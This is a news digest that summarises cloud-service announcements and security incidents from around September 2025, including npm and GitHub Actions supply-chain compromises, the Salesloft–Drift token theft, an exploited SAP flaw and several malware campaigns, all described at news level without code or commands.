Cloud Upgrades Lead, As Supply-Chain Attacks and SAP Exploits Hit

Attackers Inject Malware into Popular npm Packages

🚨 Attackers phished and hijacked a package maintainer's account via a fake support domain, then updated index.js files in multiple npm packages to inject a browser-based interceptor. The malicious code targets web clients, monitoring Ethereum, Bitcoin, Solana, Tron, Litecoin and Bitcoin Cash transactions and replacing wallet destinations to redirect funds. Affected packages collectively account for over 2.6 billion weekly downloads, making this a substantial supply-chain compromise. Investigation and remediation are ongoing.

BigQuery's CMETA: Column Metadata Index for Scale Performance

🔍 BigQuery's new Column Metadata (CMETA) index is an automated, highly scalable metadata index that improves query pruning and reduces compute for extremely large tables. CMETA stores snapshots of block- and column-level statistics and is maintained transparently by BigQuery with no user intervention. Early adopters report up to 60x faster queries and up to 10x lower slot usage for selective filters, particularly on clustered columns.

Critical Code-Injection Vulnerability in SAP S/4HANA

⚠ Security teams must urgently patch SAP S/4HANA after a critical code-injection flaw, CVE-2025-42957 (CVSS 9.9), was fixed by the vendor on August 12 and is now being exploited in the wild. The vulnerability allows a low-privilege user to inject arbitrary ABAP via an RFC-exposed function module, bypassing authorization checks and enabling admin-level control and potential OS interference. No workaround exists; timely patching across complex SAP landscapes is essential to prevent data theft, credential harvesting, backdoors, ransomware and operational disruption.

Running Node.js HTTP Servers on Cloudflare Workers Globally

🚀 Cloudflare has added support for the node:http client and server APIs in Workers, enabling developers to deploy existing Node.js HTTP applications at the edge with minimal code changes. This change makes frameworks like Express and Koa runnable on Workers with zero cold starts, automatic scaling, and reduced latency for global users. The client APIs are implemented on top of Workers' native fetch(), and server integration uses an internal bridge that registers listen(port) rather than binding TCP sockets. Some Node-specific features remain limited or unsupported (the Agent is effectively a no-op; trailers, early hints, 1xx responses, and TLS-specific options are not available).

Managed Tiered Checkpointing for Amazon SageMaker HyperPod

⚡ Amazon Web Services has announced general availability of managed tiered checkpointing for Amazon SageMaker HyperPod, a hybrid checkpointing capability that caches frequent checkpoints in CPU memory and periodically persists them to Amazon S3 for durability. The approach reduces model recovery time and minimizes training progress loss on large-scale clusters. It integrates with PyTorch Distributed Checkpoint (DCP) and is enabled via a CreateCluster/UpdateCluster API parameter; customers can use the sagemaker-checkpointing Python library to adopt it with minimal code changes. Currently available for HyperPod clusters using the EKS orchestrator.

Horizon: Accelerating AAOS Development with Google Cloud

🚗 Horizon is an open-source, cloud-native software factory developed by Google and Accenture to standardize platform development for Android Automotive OS (AAOS) and related embedded vehicle software. It promotes a virtual-first workflow using high-fidelity cloud devices, VHAL, virtio, and scalable Cuttlefish instances to enable elastic testing and rapid developer feedback. Innovations such as the Android Build File System (ABFS), containerized reproducible builds, and integrated code tooling have produced 10x–50x faster feedback in early deployments, reducing build times and supporting high-frequency, higher-quality releases.

Improved AI Assistance in Amazon SageMaker Unified Studio

🤖 Amazon Web Services announced enhancements to the Amazon Q Developer chat experience within SageMaker Unified Studio Jupyter notebooks and added a command-line interface for use in notebooks and the Code Editor. By integrating with Model Context Protocol (MCP) servers, the assistant becomes aware of project resources—data, compute, and code—and provides personalized, context-aware help. These updates aim to speed tasks like code refactoring, file edits, and troubleshooting while preserving transparency around assistant actions. The capabilities are available at no additional cost via the Amazon Q Developer Free Tier where SageMaker Unified Studio is offered; customers can enable Amazon Q Developer Pro for expanded functionality.

Google to Let Users Set AI Mode as Default Search Option

🔎 Google will let users set AI mode as their default search tab, replacing the traditional blue links view for those who opt in. The change will be user-controlled via a toggle or button so individuals can choose AI-driven summaries as their primary experience while the classic Web tab remains accessible. Google says it is studying the impact on ads and publishers.

Salesloft–Drift Supply Chain Breach and Weekly Recap

🔒 Salesloft has moved to take Drift offline after a supply‑chain compromise that resulted in the mass theft of OAuth tokens and unauthorized access to Salesforce data. Multiple large vendors — including Cloudflare, Google Workspace, PagerDuty, Palo Alto Networks, and Tenable — confirmed impact, and activity is attributed to clusters tracked as UNC6395 and GRUB1. The incident underscores how fragile integrations can be and the importance of token hygiene, rapid revocation, and enhanced monitoring to contain downstream exposure.

GhostAction GitHub Supply Chain Attack Exposes 3,325 Secrets

🚨 A GitHub supply chain campaign dubbed GhostAction has exposed 3,325 secrets across multiple package ecosystems and repositories. GitGuardian says attackers abused compromised maintainer accounts to insert malicious GitHub Actions workflows that trigger on push or manual dispatch, read repository secrets, and exfiltrate them via HTTP POST to an external domain. Compromised credentials include PyPI, npm, DockerHub, Cloudflare, AWS keys and database credentials; vendors were notified and many repositories reverted the changes.

Salesloft March GitHub Breach Led to Salesforce Data Theft

🔒 Salesloft says attackers first breached its GitHub account in March, enabling the theft of Drift OAuth tokens later abused to access customer systems. The stolen tokens were used in widespread Salesforce data-theft operations disclosed in August, affecting multiple enterprise customers. Salesloft engaged Mandiant, rotated credentials, isolated Drift infrastructure, and restored integrations after validating containment.

MostereRAT Campaign Uses EPL, mTLS, and Legitimate RATs

🛡️ FortiGuard Labs identified a sophisticated phishing campaign that chains an Easy Programming Language (EPL) runtime with multi-stage payloads to deploy MostereRAT. The initial dropper, based on a wxWidgets sample, creates SYSTEM services and decrypts modules that run in memory while presenting social‑engineering prompts. Operators use mTLS‑protected C2 channels, disable and block security tooling via WFP filters, and install legitimate remote access tools such as AnyDesk and TightVNC to secure covert, persistent full access.

Qualys, Tenable Confirm Access in Salesloft Drift Attack

🔐 Tenable and Qualys reported limited unauthorized access to parts of their Salesforce records after attackers stole OAuth tokens from the Salesloft Drift integration. The incidents exposed support-case subject lines, initial descriptions and basic business contact details, but neither vendor's products or core services were affected. Both firms disabled the Salesloft Drift app, revoked or rotated credentials, and said they are working with Salesforce and investigators to contain the impact.

18 Popular JavaScript Packages Hijacked to Steal Crypto

🔐 Akido researchers found that at least 18 widely used JavaScript packages on NPM were briefly modified after a maintainer was phished, impacting libraries downloaded collectively more than two billion times weekly. The injected code acted as a stealthy browser interceptor, capturing and rewriting cryptocurrency wallet interactions and payment destinations to attacker-controlled accounts. The changes were rapidly removed, but experts warn the same vector could deliver far more disruptive supply-chain malware if not addressed. Security specialists urge mandatory phish-resistant 2FA and stronger commit attestation for high-impact packages.

GitHub Account Compromise Led to Salesloft Drift Breach

🔒 Salesloft says the breach tied to its Drift application began after a threat actor compromised its GitHub account. Google-owned Mandiant traced the actor, tracked as UNC6395, accessing the account from March through June 2025 and downloading repository content, adding a guest user and establishing workflows. Attackers then accessed Drift's AWS environment and obtained OAuth tokens used to reach customer data via integrations, prompting Salesloft to isolate Drift infrastructure and take the application offline on September 5, 2025. Salesloft recommends revoking API keys for third-party apps integrated with Drift, and Salesforce has restored most Salesloft integrations while keeping Drift disabled pending further remediation.

Wealthsimple Confirms Supply-Chain Breach Affecting 30,000

🔒 Wealthsimple has confirmed a supply-chain related data breach that exposed information for roughly 30,000 customers after software from a third-party vendor was compromised on August 30. The leaked data reportedly included contact details, government-issued IDs, Social Insurance Numbers, dates of birth, IP addresses and account numbers. Wealthsimple says passwords were not accessed, no client accounts were compromised and no funds were stolen. The firm says it contained the intrusion within hours, notified regulators and is offering affected customers two years of free credit monitoring, dark-web monitoring, identity theft protection and a dedicated support team.

GhostAction Supply-Chain Attack Steals 3,325 Secrets

🔒 GitGuardian uncovered a widespread supply-chain campaign it named GhostAction after detecting suspicious activity in a FastUUID GitHub repository. A compromised maintainer pushed a malicious GitHub Actions workflow that harvested secrets, initially capturing a PyPI token, and further investigation revealed hundreds of similar commits across multiple repositories. In total 3,325 secrets were exfiltrated from 817 repositories belonging to 327 users, with DockerHub credentials, GitHub tokens and npm tokens among the most common. GitGuardian notified platform security teams and many affected projects have begun reverting malicious changes while investigations continue.

Lovesac Confirms Data Breach Following Ransomware Claim

🔒 Lovesac reported a cybersecurity incident in which unauthorized actors accessed internal systems between February 12, 2025 and March 3, 2025, with the company detecting the activity on February 28, 2025. The notice to impacted individuals states that full names and additional personal information were stolen, although specific data elements and the total number of affected people were not disclosed. Lovesac says it remediated the intrusion within three days and currently has no indication the information has been misused, but it is advising vigilance for phishing and other fraud. The RansomHub ransomware group claimed responsibility and added Lovesac to its extortion portal; affected individuals are being offered 24 months of Experian credit monitoring.

GPUGate: Malware Uses Google Ads and GitHub Redirects

🔒 Cybersecurity researchers have disclosed a sophisticated malvertising campaign that leverages paid search ads and manipulated GitHub commit URLs to redirect victims to attacker-controlled infrastructure. The first-stage dropper is a bloated 128 MB MSI that evades many online sandboxes and employs a GPU-gated decryption routine dubbed GPUGate, which aborts on systems lacking a real GPU or proper drivers. The campaign uses a lookalike domain (gitpage[.]app) and a VBScript-to-PowerShell chain that gains admin privileges, adds Microsoft Defender exclusions, establishes persistence, and stages secondary payloads for data theft.

GhostAction Campaign Steals 3,325 Secrets via GitHub Actions

🔍GitGuardian disclosed a GitHub Actions supply chain campaign named GhostAction that exfiltrated 3,325 secrets from 327 users across 817 repositories before being contained on September 5. Attackers injected malicious workflow files to harvest CI/CD tokens (including PYPI_API_TOKEN) and sent them via HTTP POST to an actor-controlled endpoint. GitGuardian coordinated with maintainers and registries to revert commits, set impacted packages to read-only, and notify vendors.

MostereRAT Targets Windows with Layered Stealth Tactics

🔒 FortiGuard Labs has uncovered MostereRAT, a Remote Access Trojan targeting Microsoft Windows that uses layered evasion and persistence techniques. Written in Easy Programming Language, the malware deploys a multi-stage chain, uses mutual TLS for C2 communication, and can disable Windows Update and antivirus processes. The campaign, aimed largely at Japanese users, begins with phishing emails that lead to a malicious Word download and installs services running at SYSTEM-level, while deploying remote access tools such as AnyDesk and TightVNC.

AWS WAF Now Available in Asia Pacific (Taipei) Region

🛡️ AWS WAF is now available in the AWS Asia Pacific (Taipei) Region, allowing customers to deploy web application firewall protections closer to their users. The service helps protect web applications from common exploits and automated bots that can affect availability, security, or resource consumption. Note that AWS WAF Bot Control with targeted inspection and the Anti-DDoS managed rule group are not currently available in this region.

German Companies Affected by 2024–2025 Cyberattacks

🔒 In 2024 and into 2025, a wide range of German companies — from small and mid-sized enterprises to publicly listed groups and critical-service providers — were struck by ransomware and other intrusions, causing operational disruptions, lost revenue, supply-chain effects and reputational harm. Notable victims include Volkswagen Group, Adidas, Samsung Germany and several defence and manufacturing firms, while IT service providers and regional utilities were also targeted. At least one company (Fasana GmbH) reported insolvency after an attack. The editorial team updates this list regularly, but it is not exhaustive.

Amazon SageMaker Unified Studio Adds Custom Blueprints

🔧 AWS announced general availability of Custom Blueprints in Amazon SageMaker Unified Studio, enabling customers to supply their own managed IAM policies when creating project roles. Teams can replace or augment the default service-managed policies and use custom AWS CloudFormation templates to define infrastructure and parameters for resources such as Amazon EMR on EC2, AWS Glue Data Catalog, and Amazon Redshift. Sample templates are available in the SageMaker documentation, and the capability is offered in all AWS Commercial Regions where the next-generation SageMaker is available.

Stopping Ransomware Before It Starts: Pre-Ransomware Insights

🔒Cisco Talos Incident Response (Talos IR) analyzed pre-ransomware engagements from January 2023 through June 2025 to determine which controls most often prevented ransomware deployment. Rapid engagement with incident responders and near-immediate action on EDR/MDR alerts were the two strongest correlates of stopping encryption. Talos found that aggressive blocking and quarantine settings, strict identity and privilege controls, improved logging, and early notifications from partners materially increased the chance of eviction before encryption. The guidance focuses on securing remote services, credential protection, application allowlisting, and network segmentation.

Amazon CloudFront Adds IPv6 Origin Connectivity Support

🌐 Amazon CloudFront now supports IPv6 connectivity to origin servers, enabling end-to-end IPv6 content delivery for web applications. Customers can configure custom origins as IPv4-only (default), IPv6-only, or dual-stack; in dual-stack mode CloudFront will automatically balance requests across IPv4 and IPv6 addresses. IPv6 origin support is available in all supported AWS Commercial Regions and excludes Amazon S3 and VPC origins. This capability can improve performance for native IPv6 users and reduce pressure from IPv4 address exhaustion for origin infrastructure.

AWS WAF Adds Free Vended Logs Based on Request Volume

📣 AWS WAF now includes a free allocation of Vended Logs ingestion to CloudWatch: 500 MB for every 1 million WAF requests processed, provided at no additional cost. The allocation is applied automatically across WAF vended logs to CloudWatch, S3, and Firehose and is reconciled on your AWS bill at month end. Usage beyond the included allowance is charged at standard AWS WAF Vended Logs CloudWatch rates. This change helps reduce logging costs while preserving comprehensive security visibility and analytics.

Remote Access Abuse Signals Major Pre-Ransomware Risk

🔒 Cisco Talos finds abuses of remote access software and services are the most common pre-ransomware indicator, with threat actors leveraging legitimate tools such as RDP, PsExec, PowerShell and remote-support apps like AnyDesk and Microsoft Quick Assist. The report highlights credential dumping (for example, Mimikatz) and network discovery as other frequent TTPs. It recommends rapid response, MFA, application allowlisting and enhanced endpoint monitoring to limit ransomware execution.

Amazon Keyspaces supports now(), uuid(), and Duration types

🔧 Amazon Keyspaces (for Apache Cassandra) now supports the now() and uuid() functions in SELECT clauses, extending prior support in WHERE, INSERT, and UPDATE. It also introduces a native Duration data type to represent elapsed time between timestamps, removing the need to store intervals as strings or bytes. These updates improve Apache Cassandra compatibility and simplify time-based operations and identifier generation across AWS Commercial and GovCloud regions.

Reviewing AI Data Center Policies to Mitigate Risks

🔒 Investment in AI data centers is accelerating globally, creating not only rising energy demand and emissions but also an expanded surface of cyber threats. AI facilities rely on GPUs, ASICs and FPGAs, which introduce side-channel, memory-level and GPU-resident malware risks that differ from traditional CPU-focused threats. Organizations should require operators to implement supply-chain vetting, physical shielding (for example, Faraday cages), continuous model auditing and stronger personnel controls to reduce model exfiltration, poisoning and foreign infiltration.

German Cyberattack Forces Wehrle-Werk AG into Insolvency

🔒 Wehrle-Werk AG has filed for insolvency after 165 years of operation, citing a damaging cyberattack in May 2024 that severely disrupted production, communications and business processes. A provisional insolvency administrator has been appointed to secure operations, conduct talks with customers and suppliers, and arrange pre-financing of insolvency wages to ensure employee pay for the coming months. The Baden-Württemberg firm, which employs around 250 staff and specializes in environmental technology—thermal waste disposal, sewage sludge combustion for phosphorus recovery and wastewater treatment—reported that its subsidiaries in Switzerland, Spain, the UK, Russia and Malaysia are not affected.

AI in Government: Power, Policy, and Potential Misuse

🔍 Just months after Elon Musk’s retreat from his informal role guiding the Department of Government Efficiency (DOGE), the authors argue that DOGE’s AI agenda has largely consolidated political power rather than delivered public benefit. Promised efficiency gains and automation have produced few savings, while actions such as firing inspectors, weakening transparency and deploying an “AI Deregulation Decision Tool” have amplified partisan risk. The essay contrasts these outcomes with constructive alternatives—public disclosures, enforceable ethical frameworks, independent oversight and targeted uses like automated translation, benefits triage and case backlog reduction—to show how AI could serve the public interest if governed differently.

Amazon Neptune Analytics Now Supported in NetworkX

🚀 NetworkX now supports Amazon Neptune Analytics as a graph store, enabling developers to use familiar NetworkX APIs while transparently offloading heavy graph-algorithm workloads to Neptune’s scalable analytics engine. The integration provides Zero-ETL data handling, automatic provisioning and teardown for a serverless-like experience, and preserves existing Python workflows without refactoring code.

Signal adds opt-in end-to-end encrypted backups for chats

🔒 Signal has introduced an opt-in secure cloud backups feature that creates end-to-end encrypted archives of users' messages and recent media. The capability is available now in the Android beta and will be rolled out to iOS and desktop after testing completes. The free tier stores messages and up to 45 days of media within a 100 MiB limit; a paid $1.99/month plan raises storage to 100 GB and extends media retention. Backups occur daily, exclude soon-to-disappear and view-once messages, and are protected by a 64-character recovery key generated on-device that Signal never receives.

Networking and Security Trends Driving SASE Adoption

🔒 Secure Access Service Edge (SASE) combines networking and security into a unified, cloud-delivered platform designed for the realities of remote and hybrid work. With nearly half of knowledge workers operating remotely or in hybrid models and many organizations adopting cloud apps and distributed branches, traditional perimeter-based models are no longer sufficient. SASE addresses distributed access, policy consistency, and simplified management while reducing attack surface and operational complexity.

Onboarding Attacks: When Fake Hires Become Insider Threats

🔐 Attackers are increasingly bypassing email defenses by infiltrating organizations through the hiring process, as in the 'Jordan' example where a bogus hire gained broad access on day one. Remote recruiting, AI-generated profiles and deepfakes have turned identity into the new perimeter, undermining traditional vetting. Adopting zero standing privileges—with JIT/JEP, strict baselines and comprehensive auditing—and tools such as BeyondTrust Entitle can remove persistent access and automate time‑bound, auditable privilege grants.

Surge in Network Scans Targets Cisco ASA Devices Worldwide

🔎 Security researchers observed a large surge in network scans probing Cisco ASA login portals and Cisco IOS Telnet/SSH endpoints, with GreyNoise recording two major spikes in late August 2025. The second wave on August 26, 2025, was largely (about 80%) driven by a Brazilian botnet using roughly 17,000 IPs and overlapping Chrome-like user agents that suggest a common origin. Administrators are urged to apply the latest patches, enforce MFA for remote ASA logins, avoid exposing management pages and services directly, and use VPN concentrators, reverse proxies, geo-blocking, and rate limiting to reduce risk.

Calcio sports piracy network with 123M annual visits shut

🛑 Calcio, a major illegal sports-streaming platform that drew over 123 million visits in the past year across 134 domains, has been shut down after coordinated action by ACE and DAZN. The Moldova-based operator agreed to cease operations and transferred domains to ACE, which now redirects them to its Watch Legally site. The service had been especially popular in Italy, accounting for more than 80% of traffic.

Google Gen AI Training and Certification for Veterans

🎖️ Google Public Sector is opening registration for a no-cost, three-week virtual program, Google Launchpad for Veterans, offering foundational generative AI training and a path to the Gen AI Leader certification. The Gen AI Leader training includes a two-day kickoff on November 13–14, optional exam prep sessions, and a complimentary exam voucher. Participants will learn core LLM concepts, how to navigate the AI ecosystem, and practical business applications using Gemini and NotebookLM to drive organizational transformation.

CISA Priorities at 16th Billington CyberSecurity Summit

🔐 The Cybersecurity and Infrastructure Security Agency (CISA) will present senior leaders and experts at the 16th Annual Billington CyberSecurity Summit, Sept. 9–12 in Washington, D.C. Acting Director Madhu Gottumukkala and new Executive Assistant Director for Cybersecurity Nick Andersen will deliver fireside chats outlining CISA’s strategic objectives. Other sessions address vulnerability management, threat hunting, supply chain collaboration, and AI in code security. Registration is required.

Four-Step EASM Framework to Reduce External Cyber Risk

🔍 External Attack Surface Management (EASM) requires a continuous, automated approach to discover internet-facing assets, detect vulnerabilities and prioritize remediation. The article outlines a practical four-step process — identify and classify assets, risk detection, risk assessment, and prioritization and remediation — to reduce external cyber risk. A real-world Jenkins misconfiguration illustrates how shadow IT and configuration changes can expose sensitive data, and why centralized, recurrent EASM platforms that integrate with existing workflows and provide actionable guidance are essential. Effective defense combines fast MTTD from tools with responsive teams to achieve timely MTTR.

Action1 vs WSUS: A Modern Approach to Patch Management

⚙️ This sponsored comparison contrasts Action1, a cloud-native patch management platform, with Microsoft's legacy WSUS. It examines installation, ongoing maintenance, patch coverage, remote delivery, automation, troubleshooting, and reporting. The piece argues that Action1 reduces infrastructure overhead, patches third-party apps, and supports remote endpoints without VPN. It concludes that Action1 better fits modern, hybrid environments and audit-driven compliance needs.

Is the CISO Role Broken? Rethinking Security Leadership

🧭 The article argues that the modern CISO role has become unmanageable for many practitioners and often fails to deliver meaningful, long-term change. It traces causes to short tenures, technologist backgrounds, and siloed corporate governance, and advocates splitting responsibilities by creating a senior CSO focused on business protection while returning the CISO to a technical, execution-oriented remit. The author urges CISOs to rebuild trust through demonstrable delivery rather than constant demands, and suggests this structural change will improve governance, tenure, and recruitment.

Ten Security Leadership Missteps That Damage Careers

🔒 Security leaders must avoid career-limiting behaviors that erode trust and effectiveness. The article outlines 10 common missteps — from failing to align security with business priorities and remaining purely technical to drawing inflexible red lines and mishandling AI — that stall advancement. It stresses practical shifts: become a business partner, balance risk with speed, improve asset visibility, foster relationships, and rehearse incident response to maintain credibility.